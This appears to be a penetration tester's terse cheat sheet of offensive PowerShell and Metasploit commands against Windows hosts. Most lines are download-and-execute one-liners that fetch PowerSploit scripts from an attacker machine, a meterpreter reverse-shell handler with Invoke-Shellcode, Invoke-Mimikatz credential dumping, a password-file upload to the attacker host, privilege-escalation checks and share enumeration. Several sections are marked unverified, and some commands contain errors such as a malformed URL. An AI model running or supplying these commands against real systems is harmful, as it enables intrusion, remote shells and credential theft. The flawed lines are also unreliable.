PowerShell - How To


# Download a file
cd to a discrete, writable directory (C:\Users\<user>\Desktop)
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadFile('http://192.168.1.5/PowerView.ps1', 'PowerView.ps1')"
powershell.exe -nop -exec bypass
Import-Module .\PowerView.ps1

# Execute a remote file
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5/PowerView.ps1');Get-NetLocalGroup"

# Upload a file
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).UploadString('http://192.168.1.5/passwords.txt',"<PostDATA>")"
------------------------------------------------------------------------------------------------------------------------------------------------------

# PowerSploit - getting a shell without writing to disk     *** NEED to VERIFY ***

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.5
set lport 443
exploit -j

- Open a new tab, load from Kali
/opt/CrackMapExec/build/lib/cme/data/powersploit/CodeExecution/
python3 -m http.server 80

- Windows execute a remote file
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.5 -Lport 443 -Force"
------------------------------------------------------------------------------------------------------------------------------------------------------

# Priv escalation         *** NEED to VERIFY ***

- Load from disk
powershell -nop -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

- Load from Kali
cd /opt/PowerSploit/Privesc/
python3 -m http.server 80

- Windows execute a remote file
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5/PowerUp.ps1');Invoke-AllChecks"

powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.5 -Lport 443 -Force"
------------------------------------------------------------------------------------------------------------------------------------------------------

# Dump creds              *** NEED to VERIFY ***

- Download from Kali
cd /opt/PowerSploit/Exfiltration/
python3 -m http.server 80

- Windows
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
------------------------------------------------------------------------------------------------------------------------------------------------------

# Find open fileshares    *** NEED to VERIFY ***

- Download from Kali
cd /opt/PowerSploit/Recon/
python3 -m http.server 80

- Windows
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5s/PowerView.ps1');Invoke-Netview"
Invoke-ShareFinder -CheckShareAccess

New-PSDrive S -PSProvider FileSystem -Root \\10.0.0.14\SYSVOL
PSDrive
Remove-PSDrive S

